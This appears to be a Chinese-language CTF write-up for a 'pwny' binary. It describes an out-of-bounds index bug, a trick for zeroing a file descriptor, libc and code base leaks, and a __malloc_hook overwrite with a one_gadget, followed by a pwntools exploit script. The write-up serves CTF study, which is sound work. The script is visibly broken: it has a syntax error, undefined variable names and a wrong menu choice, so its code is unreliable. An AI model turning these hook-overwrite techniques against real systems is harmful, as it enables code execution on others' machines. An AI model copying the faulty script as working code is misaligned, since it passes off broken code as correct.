保护拉满。
两个功能,read write
read
202860放了一个随机数。
read把随机数当作文件fd。
write
也是一个read函数,fd是刚刚那个随机数。
但是这里的write显然index可以随便写,就会有个越界。
我们可以把fd文件号改成从文件中读出来的这个数,但是我们想让他为0,但是显然不大行,因为你不知道这个数是多少
当我们两次write的改fd,第一次fd改成一个比较大的数,第二次就会导致读取失败,所以v2的值不会变,利用的是这种巧妙的手法,来让fd等于0.
接下来就是利用read具有的show功能,找好bss和data上的数据泄露出来,我们就可以获取libc和代码基地址。最后就是利用scanf读取过长的输入时会分配chunk,也就是说会使用malloc_hook,此时就可以在malloc_hook处写入one_gadget。
exp
from pwn import *
r = process("./pwny"])
libc = ELF("./libc.so.6")
def write(index):
r.sendlineafter("Your choice: ","2")
r.sendlineafter("Index: ",str(idx))
def write_con(idx, content):
r.sendlineafter("Your choice: ","2")
r.sendlineafter("Index: ",str(idx))
r.send(con)
def read(con):
r.sendlineafter("Your choice: ","2")
r.sendafter("Index: ",content)
write(256)
write(256)
read(p64(0xfffffffffffffffc))
r.recvuntil("Result: ")
libc_base = int(r.recvuntil("\n", drop=True), 16)-libc.sym["_IO_2_1_stderr_"]
malloc_hook = libc_base+libc.sym["__malloc_hook"]
realloc = libc_base+libc.sym["realloc"]
one_gadget = libc_base + 0x4f365
read(p64(0xfffffffffffffff5))
r.recvuntil("Result: ")
code_base = int(r.recvuntil("\n", drop=True), 16)-0x202008
print("code base: ", hex(code_base))
offset = (m_hook-code_base-0x202060)/8
write_con(int(offset), p64(realloc+9))
write_con(int(offset-1), p64(one_gadget))
r.sendlineafter(":", "1"*0x400)
r.interactive()